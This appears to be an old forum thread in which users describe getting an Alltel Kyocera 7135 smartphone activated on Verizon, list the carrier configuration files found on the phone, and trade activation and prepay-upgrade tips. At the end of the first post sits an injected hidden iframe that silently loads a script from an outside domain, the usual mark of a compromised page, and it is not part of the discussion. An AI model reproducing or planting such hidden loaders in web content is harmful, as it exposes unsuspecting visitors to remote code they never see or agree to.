First off, let me thank everyone who posts on this board. I have lurked for about a year and really got into things leading up to the 7135 stuff. It's nice to know that there are people out there who are as fanatical about tech stuff as I am.
Here's my story. Ordered the 7135 on Friday. Monday, I was leaving to go to my Mom's house for Xmas (live in De, mom lives in Va, just outside DC). I was waiting all morning for the Fedex guy. I went to gas up my car and came back to the house to check one last time. HE WAS IN MY DRIVEWAY!! I gave him a high five (thought hugging would be a little forward), I got the phone and took off down the road.
Today (Tuesday) I walked into a Verizon store in Northern Va. and handed the phone to a tech. His eyes popped out of his head and he asked where I got it. I told him and asked him if he could activate it. He went behind his desk, I went over to look (and laugh to myself) at the other phones VZW had available for sale and three minutes later, bada bing bada boom, I'm in there like underwear!!
Never thought it would be that easy. Needless to say, it will be a Merry Christmas indeed!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Did you sign up for Express Network or just a voice plan?
I was going to wait for Verizon to offer the phone (and my release date guesses in the latest contest to pass) but hearing of a succesful Verizon activation of an Alltel phone is making me think of changing my mind....
Which NorVa VZW store did you go to? If I do go for it, and my local MD stores have a problem, I'll drive to NorVa to work with the same tech
Finally... Will you stop by my place on your way home so I can see it? (I am just couple of miles off I95. I'll feed you or give you beer...)
I have a 215 number (Philly) because that's where I work (outside sales). No problem. He just flipped the phone to that number. The phone account is through my employer, so it's voice only, but I can upgrade it.
Until I'm sure that what the tech did for me is not a super-illegal thing, I don't want to broadcast the store location. PM me, though and I'll give you the scoop. I'm sure the last thing the guy wants is for an army of us techies descending on his store and demanding satisfaction.

I'll just PM you if my local tech is unable to do it. I don't expect a problem. One of the tech's in Laurel MD was as jazzed as I am about this phone several months ago.
I suppose, if I do order the AllTel phone, at worst I'll need to wait for Verizon's release to get Express Network. Even qnc from a smartphone would be better then qnc or Mobile Web from my StarTac... I think I am just about convinced to go for it. I am no where near the end of my contract, so I will probably wind up paying close to full price with VZW anyway.
Based on your success I have just guarenteed that I will be the contest winner, because I just ordered my unactivated phone from AllTell.
If by some miracle, I do win, I'll probably have it activated on Sprint, and see which service I like better for a month, then cancel one of them and sell the phone.
Funny you say that, because I was poking around the file system and there seems to be configuration files for the carriers that I guess will eventually support the phone. Here they are:
They're called QCQT databases:
Alltel
Bell
GenericK1
GenericS1
Leap
Metro PCS
Orange
Pegaso
QWest
Sprint (aha!)
Telecom
Telstra
Telus
VMU
VZW AIR (airtouch?)
VZW BAM (Bell Atlantic)
Pretty interesting stuff. I know some people have heard that Sprint won't carry the phone. Does the presence of this file shed any light on whether they will?

If you are not up on your contract just open a PrePay plan, you get some kind of deal, not as good as signing for 2 years but a deal is better than full retail. After your prepay is activated transfer your account to the new phone!!!Yamo you just upgraded your phone without paying full retail!!!!
Well, after lurking for a couple of weeks and learning a lot, I bit the bullet yesterday and ordered the no-plan phone from Alltel. Am SO glad to hear someone has successfully converted to Verizon!! Will let you know how conversion works here in South Florida as soon as phone arrives (damn the holiday!!)

David.
Any chance you live near West Palm Beach or North Palm? I would love to see the phone in person. There's a great Verizon store in the Gardens Mall.
